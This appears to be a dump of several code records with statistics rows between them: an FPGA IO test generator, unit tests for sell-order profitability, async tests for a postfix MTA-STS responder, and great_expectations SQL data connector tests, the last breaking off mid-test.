if (cnt_ps >= (100000000 / (2*100)) - 1) begin
cnt_ps <= 0;
ino_t <= !ino_t;
if (ino_t == 1'b1)
ino_o <= !ino_o;
end else begin
cnt_ps <= cnt_ps + 1;
ino_t <= ino_t;
ino_o <= ino_o;
end
always @(posedge clk_bufg)
if (ino_t == 1'b1)
led <= ino_i;
else
led <= led;
""".format(pinout["BUFG"])

    # Instantiate one IOBUFDS per (slew, drive) combination.
    combos = ((s, d) for s in slews for d in drives)
    for idx, (slew, drive) in enumerate(combos):
        params = {"IOSTANDARD": "\"{}\"".format(iostandard)}
        if drive is not None and drive != "0":
            params["DRIVE"] = int(drive)
        if slew is not None:
            params["SLEW"] = "\"{}\"".format(slew)

        pin_p, pin_n = pinout["differential"][idx]
        param_str = ",".join(
            ".{}({})".format(k, v) for k, v in params.items()
        )
        verilog += """
IOBUFDS # ({params}) iobuf_{index} (
.I(ino_o),
.O(ino_i[{index}]),
.T(ino_t),
.IO(ino_p[{index}]),
.IOB(ino_n[{index}])
);
""".format(params=param_str, index=idx)

        # Single-bit ports carry no index in the PCF.
        if port_count > 1:
            pcf += "set_io ino_p[{}] {}\n".format(idx, pin_p)
            pcf += "set_io ino_n[{}] {}\n".format(idx, pin_n)
            pcf += "set_io led[{}] {}\n".format(idx, pinout["led"][idx])
        else:
            pcf += "set_io ino_p {}\n".format(pin_p)
            pcf += "set_io ino_n {}\n".format(pin_n)
            pcf += "set_io led {}\n".format(pinout["led"][idx])

        # Both pins of the pair share the same settings.
        iosettings[pin_p] = {k: unquote(v) for k, v in params.items()}
        iosettings[pin_n] = {k: unquote(v) for k, v in params.items()}

    # Module footer
    verilog += """
endmodule
"""
    return verilog, pcf, iosettings
# =============================================================================
def main():
    """Parse CLI arguments, run the generator selected by --mode and write
    the resulting Verilog, PCF and iosettings JSON files."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--board", required=True, help="Board")
    parser.add_argument("--mode", required=True, help="Generation mode")
    parser.add_argument("--iostandard", required=True, help="IOSTANDARD")
    parser.add_argument("--drive", required=False, nargs="+", help="DRIVE(s)")
    parser.add_argument("--slew", required=False, nargs="+", help="SLEW(s)")
    parser.add_argument(
        "--in_term", required=False, nargs="+", help="IN_TERM(s)"
    )
    parser.add_argument("-o", required=True, help="Design name")

    args = parser.parse_args()

    # Map each generation mode to a zero-argument callable; all generators
    # return a (verilog, pcf, iosettings) triple.
    generators = {
        "output":
        lambda: generate_output(
            args.board, args.iostandard, args.drive, args.slew
        ),
        "input":
        lambda: generate_input(args.board, args.iostandard, args.in_term),
        "inout":
        lambda: generate_inout(
            args.board, args.iostandard, args.drive, args.slew
        ),
        "diff_output":
        lambda: generate_diff_output(
            args.board, args.iostandard, args.drive, args.slew
        ),
        "diff_input":
        lambda: generate_diff_input(args.board, args.iostandard, args.in_term),
        "diff_inout":
        lambda: generate_diff_inout(
            args.board, args.iostandard, args.drive, args.slew
        ),
    }
    if args.mode not in generators:
        raise RuntimeError("Unknown generation mode '{}'".format(args.mode))
    verilog, pcf, iosettings = generators[args.mode]()

    # Write verilog
    with open(args.o + ".v", "w") as fp:
        fp.write(verilog)

    # Write PCF
    with open(args.o + ".pcf", "w") as fp:
        fp.write(pcf)

    # Write iosettings
    if iosettings is not None:
        with open(args.o + ".json", "w") as fp:
            json.dump(iosettings, fp, indent=2)


if __name__ == "__main__":
    main()
| 25.618644 | 81 | 0.422192 | 2,224 | 21,161 | 3.915468 | 0.138489 | 0.022049 | 0.029398 | 0.016537 | 0.829237 | 0.785485 | 0.774001 | 0.762977 | 0.76022 | 0.736909 | 0 | 0.037295 | 0.410803 | 21,161 | 825 | 82 | 25.649697 | 0.661133 | 0.102027 | 0 | 0.663366 | 0 | 0.014851 | 0.305695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013201 | false | 0 | 0.0033 | 0 | 0.029703 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f78d642eb939480bb4e1e75a45d15843dec751aa | 1,472 | py | Python | tests/models/test_sellOrder.py | Lucasgms/sell-orders-app | 26a7f423ce42a7d247e4471f6b19d0430f439d4d | [
"MIT"
] | null | null | null | tests/models/test_sellOrder.py | Lucasgms/sell-orders-app | 26a7f423ce42a7d247e4471f6b19d0430f439d4d | [
"MIT"
] | null | null | null | tests/models/test_sellOrder.py | Lucasgms/sell-orders-app | 26a7f423ce42a7d247e4471f6b19d0430f439d4d | [
"MIT"
] | null | null | null | from unittest import TestCase
from models.product import Product
from models.sell_order import SellOrder
from models.user import User
class TestSellOrder(TestCase):
    """Verifies that SellOrder classifies profitability from the sale price
    of a product that costs 100.0: above 100.0 is 'Ótima', between 90.0 and
    100.0 inclusive is 'Boa', below 90.0 is 'Ruim'."""

    @staticmethod
    def _place_order(price):
        # Create a client/product pair, register a single-unit sell order
        # at *price* and cross-link it to both sides.
        client = User('Lucas')
        product = Product('Product 1', 100.0, 0)
        sell_order = SellOrder(client, product, 1, price)
        client.purchases.append(sell_order)
        product.sell_orders.append(sell_order)
        return sell_order

    def test___set_profitability_great(self):
        # Price strictly above cost.
        assert self._place_order(100.1).profitability == 'Ótima'

    def test___set_profitability_good_1(self):
        # Price exactly at cost.
        assert self._place_order(100.0).profitability == 'Boa'

    def test___set_profitability_good_2(self):
        # Price at the lower boundary of the "good" band.
        assert self._place_order(90.0).profitability == 'Boa'

    def test___set_profitability_bad(self):
        # Price just below the "good" band.
        assert self._place_order(89.9).profitability == 'Ruim'
| 33.454545 | 57 | 0.675272 | 185 | 1,472 | 5.140541 | 0.194595 | 0.160883 | 0.126183 | 0.063091 | 0.802313 | 0.769716 | 0.769716 | 0.769716 | 0.769716 | 0.769716 | 0 | 0.038462 | 0.222826 | 1,472 | 43 | 58 | 34.232558 | 0.792832 | 0 | 0 | 0.545455 | 0 | 0 | 0.048234 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 1 | 0.121212 | false | 0 | 0.121212 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e3be0ce4867c99a7932c217d0227baf0b74c1001 | 3,860 | py | Python | tests/test_responder_volatile.py | galme/postfix-mta-sts-resolver | 3456620c8da0b2423d20225fab581f8d6896dc96 | [
"MIT"
] | null | null | null | tests/test_responder_volatile.py | galme/postfix-mta-sts-resolver | 3456620c8da0b2423d20225fab581f8d6896dc96 | [
"MIT"
] | null | null | null | tests/test_responder_volatile.py | galme/postfix-mta-sts-resolver | 3456620c8da0b2423d20225fab581f8d6896dc96 | [
"MIT"
] | null | null | null | import sys
import asyncio
import itertools
import socket
import pytest
from postfix_mta_sts_resolver import netstring
from postfix_mta_sts_resolver.responder import STSSocketmapResponder
import postfix_mta_sts_resolver.utils as utils
from async_generator import yield_, async_generator
@pytest.fixture
@async_generator
async def responder(event_loop):
    """Start an STSSocketmapResponder on a fixed test port and yield
    (responder, host, port); the responder is always stopped on teardown.

    cache_grace is set to 0 so cached entries expire immediately, which
    the grace/expiry tests rely on.
    """
    import postfix_mta_sts_resolver.utils as utils
    cfg = utils.populate_cfg_defaults(None)
    cfg["port"] = 38461
    cfg["shutdown_timeout"] = 1
    cfg["cache_grace"] = 0
    cfg["zones"]["test2"] = cfg["default_zone"]
    resp = STSSocketmapResponder(cfg, event_loop)
    await resp.start()
    result = resp, cfg['host'], cfg['port']
    # BUG FIX: the original called resp.stop() only after a normal return
    # from yield_, so a failing test left the server running (leaked socket,
    # port 38461 stays bound for subsequent tests). Ensure teardown always
    # runs.
    try:
        await yield_(result)
    finally:
        await resp.stop()
@pytest.mark.asyncio
@pytest.mark.timeout(5)
async def test_hanging_stop(responder):
    # Stopping the responder while a client sits idle must close the
    # connection, which the client observes as EOF.
    resp, host, port = responder
    reader, writer = await asyncio.open_connection(host, port)
    await resp.stop()
    received = await reader.read()
    assert received == b''
    writer.close()
@pytest.mark.asyncio
@pytest.mark.timeout(5)
async def test_inprogress_stop(responder):
    # Stop the responder while a lookup for an unresolvable domain is
    # still in flight; the client must get a clean EOF, not a hang.
    resp, host, port = responder
    reader, writer = await asyncio.open_connection(host, port)
    writer.write(netstring.encode(b'test blackhole.loc'))
    await writer.drain()
    await asyncio.sleep(0.2)
    await resp.stop()
    received = await reader.read()
    assert received == b''
    writer.close()
@pytest.mark.asyncio
@pytest.mark.timeout(5)
async def test_extended_stop(responder):
    # Same as test_inprogress_stop but with several queued requests
    # pending when the responder shuts down.
    resp, host, port = responder
    reader, writer = await asyncio.open_connection(host, port)
    for _ in range(3):
        writer.write(netstring.encode(b'test blackhole.loc'))
    await writer.drain()
    await asyncio.sleep(0.2)
    await resp.stop()
    received = await reader.read()
    assert received == b''
    writer.close()
@pytest.mark.asyncio
@pytest.mark.timeout(7)
async def test_grace_expired(responder):
    # With cache_grace=0 a cached entry is stale immediately; a repeat
    # query after the policy max_age window must still return the same
    # answer.
    resp, host, port = responder
    reader, writer = await asyncio.open_connection(host, port)
    stream_reader = netstring.StreamReader()

    async def read_reply():
        # Assemble one complete netstring response from the socket.
        string_reader = stream_reader.next_string()
        reply = b''
        while True:
            try:
                part = string_reader.read()
            except netstring.WantRead:
                data = await reader.read(4096)
                assert data
                stream_reader.feed(data)
                continue
            if not part:
                return reply
            reply += part

    try:
        writer.write(netstring.encode(b'test good.loc'))
        first_reply = await read_reply()
        await asyncio.sleep(2)
        writer.write(netstring.encode(b'test good.loc'))
        second_reply = await read_reply()
        assert first_reply == second_reply
    finally:
        writer.close()
@pytest.mark.asyncio
@pytest.mark.timeout(7)
async def test_fast_expire(responder):
    # A policy with a very short max_age must be re-fetched transparently:
    # two queries straddling the expiry return the identical match.
    resp, host, port = responder
    reader, writer = await asyncio.open_connection(host, port)
    stream_reader = netstring.StreamReader()

    async def read_reply():
        # Assemble one complete netstring response from the socket.
        string_reader = stream_reader.next_string()
        reply = b''
        while True:
            try:
                part = string_reader.read()
            except netstring.WantRead:
                data = await reader.read(4096)
                assert data
                stream_reader.feed(data)
                continue
            if not part:
                return reply
            reply += part

    try:
        writer.write(netstring.encode(b'test fast-expire.loc'))
        first_reply = await read_reply()
        await asyncio.sleep(2)
        writer.write(netstring.encode(b'test fast-expire.loc'))
        second_reply = await read_reply()
        assert first_reply == second_reply == b'OK secure match=mail.loc'
    finally:
        writer.close()
| 30.88 | 68 | 0.643782 | 475 | 3,860 | 5.107368 | 0.204211 | 0.04122 | 0.065952 | 0.085738 | 0.790602 | 0.769992 | 0.769992 | 0.769992 | 0.73784 | 0.734542 | 0 | 0.009372 | 0.253627 | 3,860 | 124 | 69 | 31.129032 | 0.832697 | 0 | 0 | 0.765217 | 0 | 0 | 0.057787 | 0 | 0 | 0 | 0 | 0 | 0.06087 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.104348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5423f37f195571e043e7da0e6be275bf8685e506 | 44,985 | py | Python | tests/datasource/data_connector/test_sql_data_connector.py | arunnthevapalan/great_expectations | 97f1481bcd1c3f4d8878c6f383f4e6f008b20cd1 | [
"Apache-2.0"
] | 1 | 2022-03-16T22:09:49.000Z | 2022-03-16T22:09:49.000Z | tests/datasource/data_connector/test_sql_data_connector.py | draev/great_expectations | 317e15ee7e50f6e0d537b62154177440f33b795d | [
"Apache-2.0"
] | null | null | null | tests/datasource/data_connector/test_sql_data_connector.py | draev/great_expectations | 317e15ee7e50f6e0d537b62154177440f33b795d | [
"Apache-2.0"
] | 1 | 2022-03-03T16:47:32.000Z | 2022-03-03T16:47:32.000Z | import json
import random
import pytest
from ruamel.yaml import YAML
from great_expectations.core.batch import Batch, BatchRequest
from great_expectations.core.batch_spec import SqlAlchemyDatasourceBatchSpec
from great_expectations.data_context.util import instantiate_class_from_config
from great_expectations.datasource.data_connector import ConfiguredAssetSqlDataConnector
try:
sqlalchemy = pytest.importorskip("sqlalchemy")
except ImportError:
sqlalchemy = None
import great_expectations.exceptions as ge_exceptions
from great_expectations.validator.validator import Validator
yaml = YAML(typ="safe")
# TODO: <Alex>ALEX -- Some methods in this module are misplaced and/or provide no action; this must be repaired.</Alex>
def test_basic_self_check(test_cases_for_sql_data_connector_sqlite_execution_engine):
    # Self-check of a connector whose single asset is split by date.
    random.seed(0)
    execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine

    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_date_column__A:
            #table_name: events # If table_name is omitted, then the table_name defaults to the asset name
            splitter_method: _split_on_column_value
            splitter_kwargs:
                column_name: date
    """,
    )
    config["execution_engine"] = execution_engine

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)

    report = my_data_connector.self_check()
    print(json.dumps(report, indent=2))

    expected_report = {
        "class_name": "ConfiguredAssetSqlDataConnector",
        "data_asset_count": 1,
        "example_data_asset_names": ["table_partitioned_by_date_column__A"],
        "data_assets": {
            "table_partitioned_by_date_column__A": {
                "batch_definition_count": 30,
                "example_data_references": [
                    {"date": "2020-01-01"},
                    {"date": "2020-01-02"},
                    {"date": "2020-01-03"},
                ],
            }
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
        # FIXME: (Sam) example_data_reference removed temporarily in PR #2590
        # and is not asserted here until it is restored.
    }
    assert report == expected_report
def test_get_batch_definition_list_from_batch_request(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    random.seed(0)
    db = test_cases_for_sql_data_connector_sqlite_execution_engine

    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_date_column__A:
            splitter_method: _split_on_column_value
            splitter_kwargs:
                column_name: date
    """,
    )
    config["execution_engine"] = db

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)
    my_data_connector._refresh_data_references_cache()

    def definitions_for(**batch_request_kwargs):
        # Helper: issue a BatchRequest and return matching batch definitions.
        return my_data_connector.get_batch_definition_list_from_batch_request(
            batch_request=BatchRequest(**batch_request_kwargs)
        )

    # A fully specified date matches exactly one batch.
    batch_definition_list = definitions_for(
        datasource_name="FAKE_Datasource_NAME",
        data_connector_name="my_sql_data_connector",
        data_asset_name="table_partitioned_by_date_column__A",
        data_connector_query={"batch_filter_parameters": {"date": "2020-01-01"}},
    )
    assert len(batch_definition_list) == 1

    # Empty batch_filter_parameters matches every batch of the asset.
    batch_definition_list = definitions_for(
        datasource_name="FAKE_Datasource_NAME",
        data_connector_name="my_sql_data_connector",
        data_asset_name="table_partitioned_by_date_column__A",
        data_connector_query={"batch_filter_parameters": {}},
    )
    assert len(batch_definition_list) == 30

    # Note: Abe 20201109: It would be nice to put in safeguards for passing
    # a batch identifier such as "date" at the top level of
    # data_connector_query instead of inside "batch_filter_parameters";
    # currently such keys are ignored entirely and too many partitions
    # match. This is not unique to ConfiguredAssetSqlDataConnector.

    # Omitting data_connector_query entirely also matches every batch.
    batch_definition_list = definitions_for(
        datasource_name="FAKE_Datasource_NAME",
        data_connector_name="my_sql_data_connector",
        data_asset_name="table_partitioned_by_date_column__A",
    )
    assert len(batch_definition_list) == 30

    # BatchRequest requires datasource, data connector and data asset names.
    with pytest.raises(TypeError):
        # noinspection PyArgumentList
        definitions_for(
            datasource_name="FAKE_Datasource_NAME",
            data_connector_name="my_sql_data_connector",
        )

    with pytest.raises(TypeError):
        # noinspection PyArgumentList
        definitions_for(datasource_name="FAKE_Datasource_NAME")

    with pytest.raises(TypeError):
        # noinspection PyArgumentList
        definitions_for()
def test_example_A(test_cases_for_sql_data_connector_sqlite_execution_engine):
    # Asset split on a date column: one batch per distinct date.
    random.seed(0)
    db = test_cases_for_sql_data_connector_sqlite_execution_engine

    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_date_column__A:
            splitter_method: _split_on_column_value
            splitter_kwargs:
                column_name: date
    """,
    )
    config["execution_engine"] = db

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)

    report = my_data_connector.self_check()
    print(json.dumps(report, indent=2))

    expected_report = {
        "class_name": "ConfiguredAssetSqlDataConnector",
        "data_asset_count": 1,
        "example_data_asset_names": ["table_partitioned_by_date_column__A"],
        "data_assets": {
            "table_partitioned_by_date_column__A": {
                "batch_definition_count": 30,
                "example_data_references": [
                    {"date": "2020-01-01"},
                    {"date": "2020-01-02"},
                    {"date": "2020-01-03"},
                ],
            }
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
        # FIXME: (Sam) example_data_reference removed temporarily in PR #2590
        # and is not asserted here until it is restored.
    }
    assert report == expected_report
def test_example_B(test_cases_for_sql_data_connector_sqlite_execution_engine):
    # Asset split on a timestamp column converted to dates.
    random.seed(0)
    db = test_cases_for_sql_data_connector_sqlite_execution_engine

    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_timestamp_column__B:
            splitter_method: _split_on_converted_datetime
            splitter_kwargs:
                column_name: timestamp
    """
    )
    config["execution_engine"] = db

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)

    report = my_data_connector.self_check()
    print(json.dumps(report, indent=2))

    expected_report = {
        "class_name": "ConfiguredAssetSqlDataConnector",
        "data_asset_count": 1,
        "example_data_asset_names": ["table_partitioned_by_timestamp_column__B"],
        "data_assets": {
            "table_partitioned_by_timestamp_column__B": {
                "batch_definition_count": 30,
                "example_data_references": [
                    {"timestamp": "2020-01-01"},
                    {"timestamp": "2020-01-02"},
                    {"timestamp": "2020-01-03"},
                ],
            }
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
        # FIXME: (Sam) example_data_reference removed temporarily in PR #2590
        # and is not asserted here until it is restored.
    }
    assert report == expected_report
def test_example_C(test_cases_for_sql_data_connector_sqlite_execution_engine):
    # Asset split on an integer id column divided into buckets of 10.
    random.seed(0)
    db = test_cases_for_sql_data_connector_sqlite_execution_engine

    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_regularly_spaced_incrementing_id_column__C:
            splitter_method: _split_on_divided_integer
            splitter_kwargs:
                column_name: id
                divisor: 10
    """,
    )
    config["execution_engine"] = db

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)

    report = my_data_connector.self_check()
    print(json.dumps(report, indent=2))

    expected_report = {
        "class_name": "ConfiguredAssetSqlDataConnector",
        "data_asset_count": 1,
        "example_data_asset_names": [
            "table_partitioned_by_regularly_spaced_incrementing_id_column__C"
        ],
        "data_assets": {
            "table_partitioned_by_regularly_spaced_incrementing_id_column__C": {
                "batch_definition_count": 12,
                "example_data_references": [
                    {"id": 0},
                    {"id": 1},
                    {"id": 2},
                ],
            }
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
        # FIXME: (Sam) example_data_reference removed temporarily in PR #2590
        # and is not asserted here until it is restored.
    }
    assert report == expected_report
def test_example_E(test_cases_for_sql_data_connector_sqlite_execution_engine):
    # Asset split on an incrementing batch_id column.
    random.seed(0)
    db = test_cases_for_sql_data_connector_sqlite_execution_engine

    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_incrementing_batch_id__E:
            splitter_method: _split_on_column_value
            splitter_kwargs:
                column_name: batch_id
    """,
    )
    config["execution_engine"] = db

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)

    report = my_data_connector.self_check()
    print(json.dumps(report, indent=2))

    expected_report = {
        "class_name": "ConfiguredAssetSqlDataConnector",
        "data_asset_count": 1,
        "example_data_asset_names": ["table_partitioned_by_incrementing_batch_id__E"],
        "data_assets": {
            "table_partitioned_by_incrementing_batch_id__E": {
                "batch_definition_count": 11,
                "example_data_references": [
                    {"batch_id": 0},
                    {"batch_id": 1},
                    {"batch_id": 2},
                ],
            }
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
        # FIXME: (Sam) example_data_reference removed temporarily in PR #2590
        # and is not asserted here until it is restored.
    }
    assert report == expected_report
def test_example_F(test_cases_for_sql_data_connector_sqlite_execution_engine):
    # Asset split on a foreign key column (one batch per session).
    random.seed(0)
    db = test_cases_for_sql_data_connector_sqlite_execution_engine

    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_foreign_key__F:
            splitter_method: _split_on_column_value
            splitter_kwargs:
                column_name: session_id
    """,
    )
    config["execution_engine"] = db

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)

    report = my_data_connector.self_check()
    print(json.dumps(report, indent=2))

    expected_report = {
        "class_name": "ConfiguredAssetSqlDataConnector",
        "data_asset_count": 1,
        "example_data_asset_names": ["table_partitioned_by_foreign_key__F"],
        "data_assets": {
            "table_partitioned_by_foreign_key__F": {
                "batch_definition_count": 49,
                # TODO Abe 20201029 : These values should be sorted
                "example_data_references": [
                    {"session_id": 2},
                    {"session_id": 3},
                    {"session_id": 4},
                ],
            }
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
        # FIXME: (Sam) example_data_reference removed temporarily in PR #2590
        # and is not asserted here until it is restored.
    }
    assert report == expected_report
def test_example_G(test_cases_for_sql_data_connector_sqlite_execution_engine):
    """Self-check a connector that splits one asset across three columns
    (y, m, d) via _split_on_multi_column_values."""
    random.seed(0)
    execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine

    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_multiple_columns__G:
            splitter_method: _split_on_multi_column_values
            splitter_kwargs:
                column_names:
                    - y
                    - m
                    - d
    """,
    )
    config["execution_engine"] = execution_engine

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)

    report = my_data_connector.self_check()
    print(json.dumps(report, indent=2))

    expected_report = {
        "class_name": "ConfiguredAssetSqlDataConnector",
        "data_asset_count": 1,
        "example_data_asset_names": ["table_partitioned_by_multiple_columns__G"],
        "data_assets": {
            "table_partitioned_by_multiple_columns__G": {
                "batch_definition_count": 30,
                # TODO Abe 20201029 : These values should be sorted
                "example_data_references": [
                    {"y": 2020, "m": 1, "d": 1},
                    {"y": 2020, "m": 1, "d": 2},
                    {"y": 2020, "m": 1, "d": 3},
                ],
            }
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
        # FIXME: (Sam) example_data_reference removed temporarily in PR #2590;
        # it previously reported n_rows=8 for batch {"y": 2020, "m": 1, "d": 2}.
    }
    assert report == expected_report
def test_example_H(test_cases_for_sql_data_connector_sqlite_execution_engine):
    """Placeholder for _split_on_hashed_column coverage.

    sqlite has no MD5 function, so the hashed-column splitter cannot run
    against the sqlite fixture.  Skip explicitly (rather than returning early,
    which reported a misleading PASS) so the missing coverage stays visible in
    test reports until a backend with MD5 support is wired into the harness.
    """
    pytest.skip("sqlite doesn't support MD5; _split_on_hashed_column cannot be exercised")

    # Intended shape of the test once a suitable backend exists:
    # db = test_cases_for_sql_data_connector_sqlite_execution_engine
    # config = yaml.load("""
    # name: my_sql_data_connector
    # datasource_name: FAKE_Datasource_NAME
    # assets:
    #     table_that_should_be_partitioned_by_random_hash__H:
    #         splitter_method: _split_on_hashed_column
    #         splitter_kwargs:
    #             column_name: id
    #             hash_digits: 1
    # """)
    # config["execution_engine"] = db
    # my_data_connector = ConfiguredAssetSqlDataConnector(**config)
    # report = my_data_connector.self_check()
    # print(json.dumps(report, indent=2))
    # # TODO: Flesh this out once the implementation actually works to this point
    # assert report == {
    #     "class_name": "ConfiguredAssetSqlDataConnector",
    #     "data_asset_count": 1,
    #     "example_data_asset_names": [
    #         "table_that_should_be_partitioned_by_random_hash__H"
    #     ],
    #     "data_assets": {
    #         "table_that_should_be_partitioned_by_random_hash__H": {
    #             "batch_definition_count": 16,
    #             "example_data_references": [0, 1, 2],
    #         }
    #     },
    #     "unmatched_data_reference_count": 0,
    #     "example_unmatched_data_references": [],
    # }

    # Related fixture tables:
    # ['table_partitioned_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D',
    #  'table_containing_id_spacers_for_D',
    #  'table_that_should_be_partitioned_by_random_hash__H']
def test_sampling_method__limit(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """_sample_using_limit caps the batch at n rows, and the sampled rows
    span more than one date."""
    engine = test_cases_for_sql_data_connector_sqlite_execution_engine

    spec = SqlAlchemyDatasourceBatchSpec(
        {
            "table_name": "table_partitioned_by_date_column__A",
            "batch_identifiers": {},
            "splitter_method": "_split_on_whole_table",
            "splitter_kwargs": {},
            "sampling_method": "_sample_using_limit",
            "sampling_kwargs": {"n": 20},
        }
    )
    batch_data, batch_markers = engine.get_batch_data_and_markers(batch_spec=spec)

    validator = Validator(engine, batches=[Batch(data=batch_data)])

    # The limit sampler must return exactly 20 rows.
    assert len(validator.head(fetch_all=True)) == 20

    # Those 20 rows cover multiple dates, so a single-date value set fails.
    result = validator.expect_column_values_to_be_in_set(
        "date", value_set=["2020-01-02"]
    )
    assert not result.success
def test_sampling_method__random(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """Smoke-test _sample_using_random: only verifies the batch builds without
    error, because the RNG lives in the database and cannot be seeded from
    python, making the row count non-deterministic."""
    engine = test_cases_for_sql_data_connector_sqlite_execution_engine

    spec = SqlAlchemyDatasourceBatchSpec(
        {
            "table_name": "table_partitioned_by_date_column__A",
            "batch_identifiers": {},
            "splitter_method": "_split_on_whole_table",
            "splitter_kwargs": {},
            "sampling_method": "_sample_using_random",
            "sampling_kwargs": {"p": 1.0},
        }
    )
    # noinspection PyUnusedLocal
    batch_data, batch_markers = engine.get_batch_data_and_markers(batch_spec=spec)

    # random.seed() is no good here: the random number generator is in the
    # database, not python, so no row-count assertion is possible.
    # assert len(batch_data.head(fetch_all=True)) == 63
def test_sampling_method__mod(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """_sample_using_mod keeps only rows where id % 10 == 8 (12 of 120)."""
    engine = test_cases_for_sql_data_connector_sqlite_execution_engine

    spec = SqlAlchemyDatasourceBatchSpec(
        {
            "table_name": "table_partitioned_by_date_column__A",
            "batch_identifiers": {},
            "splitter_method": "_split_on_whole_table",
            "splitter_kwargs": {},
            "sampling_method": "_sample_using_mod",
            "sampling_kwargs": {
                "column_name": "id",
                "mod": 10,
                "value": 8,
            },
        }
    )
    batch_data, batch_markers = engine.get_batch_data_and_markers(batch_spec=spec)

    engine.load_batch_data("__", batch_data)
    validator = Validator(engine)
    # 120 fixture rows, one in ten matching id % 10 == 8.
    assert len(validator.head(fetch_all=True)) == 12
def test_sampling_method__a_list(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """_sample_using_a_list keeps only rows whose id is in the value list."""
    engine = test_cases_for_sql_data_connector_sqlite_execution_engine

    spec = SqlAlchemyDatasourceBatchSpec(
        {
            "table_name": "table_partitioned_by_date_column__A",
            "batch_identifiers": {},
            "splitter_method": "_split_on_whole_table",
            "splitter_kwargs": {},
            "sampling_method": "_sample_using_a_list",
            "sampling_kwargs": {
                "column_name": "id",
                "value_list": [10, 20, 30, 40],
            },
        }
    )
    batch_data, batch_markers = engine.get_batch_data_and_markers(batch_spec=spec)

    engine.load_batch_data("__", batch_data)
    validator = Validator(engine)
    # One row per listed id value.
    assert len(validator.head(fetch_all=True)) == 4
def test_sampling_method__md5(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """Placeholder for _sample_using_md5 coverage.

    sqlite has no MD5 function, so the MD5 sampler cannot be exercised against
    this fixture; the intended call is preserved below as commented-out
    scaffolding for a future multi-database harness.
    """
    # noinspection PyUnusedLocal
    execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine

    # SQlite doesn't support MD5
    # batch_data, batch_markers = execution_engine.get_batch_data_and_markers(
    #     batch_spec=SqlAlchemyDatasourceBatchSpec({
    #         "table_name": "table_partitioned_by_date_column__A",
    #         "batch_identifiers": {},
    #         "splitter_method": "_split_on_whole_table",
    #         "splitter_kwargs": {},
    #         "sampling_method": "_sample_using_md5",
    #         "sampling_kwargs": {
    #             "column_name": "index",
    #         }
    #     })
    # )
def test_to_make_sure_splitter_and_sampler_methods_are_optional(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """A batch spec works with a sampler alone, with neither splitter nor
    sampler, and with a splitter alone."""
    engine = test_cases_for_sql_data_connector_sqlite_execution_engine

    def _row_count(spec_dict):
        # Load a batch for the given spec and return its row count.
        batch_data, _batch_markers = engine.get_batch_data_and_markers(
            batch_spec=SqlAlchemyDatasourceBatchSpec(spec_dict)
        )
        engine.load_batch_data("__", batch_data)
        return len(Validator(engine).head(fetch_all=True))

    # Sampler without a splitter: mod-10 sampling keeps 12 of 120 rows.
    assert (
        _row_count(
            {
                "table_name": "table_partitioned_by_date_column__A",
                "batch_identifiers": {},
                "sampling_method": "_sample_using_mod",
